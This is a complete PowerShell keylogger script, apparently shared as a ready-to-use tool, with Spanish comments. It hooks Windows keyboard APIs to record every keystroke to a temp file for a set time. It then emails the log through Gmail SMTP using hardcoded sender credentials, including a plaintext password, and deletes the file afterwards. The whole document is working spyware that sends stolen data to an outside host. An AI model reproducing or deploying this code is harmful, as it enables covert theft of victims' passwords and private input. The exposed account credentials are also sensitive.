=============================================================================-

1. =============================================================================
2. ----------------------------------------------------------------------------
3. SIMPLE KEYLOGGER ERRO404
4. -----------------------------------------------------------------------------
5. =============================================================================
6.  
7.  
8. # Editar solo esta sección!
9. $TimeToRun = 7
10. $From = "megagames58@gmail.com"
11. $Pass = "danielcapo"
12. $To = "User2@gmail.com"
13. $Subject = "Keylogger Results"
14. $body = "Keylogger Results"
15. $SMTPServer = "smtp.gmail.com"
16. $SMTPPort = "587"
17. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
18. ############################
19.  
20.  
21. $TimeStart = Get-Date
22. $TimeEnd = $timeStart.addminutes($TimeToRun)
23.  
24. #requires -Version 2
25. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
26. {
27. # Signatures for API Calls
28. $signatures = @'
29. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
30. public static extern short GetAsyncKeyState(int virtualKeyCode);
31. [DllImport("user32.dll", CharSet=CharSet.Auto)]
32. public static extern int GetKeyboardState(byte[] keystate);
33. [DllImport("user32.dll", CharSet=CharSet.Auto)]
34. public static extern int MapVirtualKey(uint uCode, int uMapType);
35. [DllImport("user32.dll", CharSet=CharSet.Auto)]
36. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
37. '@
38.  
39. # load signatures and make members available
40. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
41.  
42. # create output file
43. $null = New-Item -Path $Path -ItemType File -Force
44.  
45. try
46. {
47.  
48. # create endless loop. When user presses CTRL+C, finally-block
49. # executes and shows the collected key presses
50. while ($TimeEnd -ge $TimeNow) {
51. Start-Sleep -Milliseconds 40
52.  
53. # scan all ASCII codes above 8
54. for ($ascii = 9; $ascii -le 254; $ascii++) {
55. # get current key state
56. $state = $API::GetAsyncKeyState($ascii)
57.  
58. # is key pressed?
59. if ($state -eq -32767) {
60. $null = [console]::CapsLock
61.  
62. # translate scan code to real code
63. $virtualKey = $API::MapVirtualKey($ascii, 3)
64.  
65. # get keyboard state for virtual keys
66. $kbstate = New-Object Byte[] 256
67. $checkkbstate = $API::GetKeyboardState($kbstate)
68.  
69. # prepare a StringBuilder to receive input key
70. $mychar = New-Object -TypeName System.Text.StringBuilder
71.  
72. # translate virtual key
73. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
74.  
75. if ($success)
76. {
77. # add key to logger file
78. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
79. }
80. }
81. }
82. $TimeNow = Get-Date
83. }
84. }
85. finally
86. {
87. # open logger file in Notepad
88. send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
89. Remove-Item -Path $Path -force
90. exit 1
91. }
92. }
93.  
94. # records all key presses until script is aborted by pressing CTRL+C
95. # will then open the file with collected key codes
96. Start-KeyLogger